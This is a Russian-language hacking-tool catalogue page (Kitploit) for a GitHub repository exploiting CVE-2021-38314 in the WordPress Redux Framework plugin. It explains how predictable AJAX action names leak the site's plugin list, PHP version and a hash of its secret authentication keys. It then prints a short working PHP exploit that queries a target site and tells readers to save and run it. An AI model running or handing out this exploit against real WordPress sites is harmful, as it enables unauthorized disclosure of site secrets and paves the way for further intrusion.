Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2021-38314 — cve-2021-38314 — Неавторизованное раскрытие конфиденциальной информации | Kitploit
Инструменты/GitHubGitHub/twseptian/cve-2021-38314
РазведкаАнализ уязвимостейЭксплуатацияСбор информацииВеб-безопасностьТестирование на Проникновение
GitHubtwseptian/cve-2021-38314

cve-2021-38314

cve-2021-38314 — Неавторизованное раскрытие конфиденциальной информации

Репозиторий
2134 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

cve-2021-38314 - Неавторизованное раскрытие конфиденциальной информации

Плагин Gutenberg Template Library & Redux Framework <= 4.2.11 для WordPress регистрировал несколько AJAX-действий, доступных неавторизованным пользователям, в функции includes в файле redux-core/class-redux-core.php. Эти действия были уникальны для конкретного сайта, но детерминированы и предсказуемы, поскольку основывались на md5-хеше URL сайта с известным значением соли '-redux' и md5-хеше предыдущего хеша с известным значением соли '-support'. С помощью этих AJAX-действий можно было получить список активных плагинов и их версий, версию PHP сайта, а также несолёный md5-хеш конкатенации AUTH_KEY и SECURE_AUTH_KEY сайта [1][2]

Исходный код

<?php
$target = "https://target.com";  
$key1 = md5("$target/-redux");
$key2 = file_get_contents("$target/wp-admin/admin-ajax.php?action=$key1");
$key3 = md5($key2. '-support');
$redux_code = file_get_contents("http://verify.redux.io/?hash=$key3&site=$target/");
echo file_get_contents("$target/wp-admin/admin-ajax.php?action=$key3&code=$redux_code");

Сохраните приведённый выше код в файл с расширением .php

Как запустить

использование

Ссылки:

  • [1] «CVE - CVE-2021-38314», Mitre.org, 2021. [Электронный ресурс]. URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38314. [Дата обращения: 15 мая 2022]
  • [2] Rizaldi Wahaz, «Неавторизованное раскрытие конфиденциальной информации в [REDACTED]», Medium, 25 нояб. 2021 г. [Электронный ресурс]. URL: https://wahaz.medium.com/unauthenticated-sensitive-information-disclosure-at-redacted-2702224098c. [Дата обращения: 15 мая 2022]
Скачать инструмент